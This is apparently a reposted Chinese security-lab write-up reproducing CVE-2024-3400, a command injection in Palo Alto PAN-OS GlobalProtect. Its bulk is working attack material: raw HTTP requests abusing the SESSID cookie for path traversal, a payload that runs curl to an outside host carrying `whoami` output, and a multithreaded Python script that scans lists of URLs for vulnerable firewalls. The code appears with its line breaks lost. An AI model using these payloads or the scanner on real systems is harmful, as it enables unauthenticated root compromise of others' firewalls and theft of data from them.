Palo Alto Networks PAN-OS 10.2、11.0、11.1存在命令注入漏洞,该漏洞源于GlobalProtect 功能中存在命令注入漏洞,可能使未经身份验证的攻击者在防火墙上以 root权限执行任意代码。
1、 PAN-OS 11.1.* < 11.1.2-h3
2、 PAN-OS 11.0.* < 11.0.4-h1
3、 PAN-OS 10.2.* < 10.2.9-h1
1.访问漏洞环境
POC (GET)
漏洞复现
POST /ssl-vpn/hipreport.esp HTTP/1.1Host: 127.0.0.1Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/mt417.txt;Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 0
更新测试
GET /global-protect/portal/images/mt417.txt执行命令
POST /ssl-vpn/hipreport.esp HTTP/1.1Host: 127.0.0.1Cookie: SESSID=./../../../opt/panlogs/tmp/device_telemetry/minute/y`curl${IFS}utkmwudrkm.dgrh3.cn?test=$(whoami)`;Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 0
3.python代码测试
import randomimport stringfrom concurrent.futures import ThreadPoolExecutorimport urllib3import requestsurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)resFile = open("resFile.txt", "w")def GenerateRandomString(length):characters = string.ascii_lowercase + string.digitsreturn ''.join(random.choice(characters) for _ in range(length))def CheckFile(url, proxy, filename):headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"}resp1 = requests.get(url=url + f"/global-protect/portal/images/{filename}.txt", headers=headers, proxies=proxy, verify=False, allow_redirects=False, timeout=10)resp2 = requests.get(url=url + f"/global-protect/portal/images/{filename}_cve_test.txt", headers=headers, proxies=proxy,verify=False, allow_redirects=False, timeout=10)if resp1.status_code == 403 and resp2.status_code == 404:return Trueelse:return Falsedef CreateFile(url, proxy):filename = GenerateRandomString(10)headers = {"Cookie": f"SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/{filename}.txt;","Content-Type": "application/x-www-form-urlencoded","User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"}resp = requests.post(url=url + "/ssl-vpn/hipreport.esp", headers=headers, proxies=proxy, verify=False, allow_redirects=False, timeout=10)if resp.status_code == 200:if CheckFile(url, proxy, filename):print(f"[+] {url}")resFile.write(f"{url}n")def GetUrls():with open("urls.txt","r") as f:for address in f.readlines():address = address.strip()yield addressif __name__ == "__main__":proxy = {"http": "http://127.0.0.1:8080",# "https": "http://127.0.0.1:8080"}#proxy = {}addrs = GetUrls()max_thread_num = 30executor = ThreadPoolExecutor(max_workers=max_thread_num)for addr in addrs:future = executor.submit(CreateFile, addr, proxy)
https://security.paloaltonetworks.com/CVE-2024-3400https://attackerkb.com/topics/SSTk336Tmf/cve-2024-3400/rapid7-analysishttps://github.com/h4x0r-dz/CVE-2024-3400?tab=readme-ov-filehttps://github.com/W01fh4cker/CVE-2024-3400-RCE?tab=readme-ov-file
原文始发于微信公众号(弥天安全实验室):【成功复现】Palo Alto Networks PAN-OS 命令注入漏洞(CVE-2024-3400)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论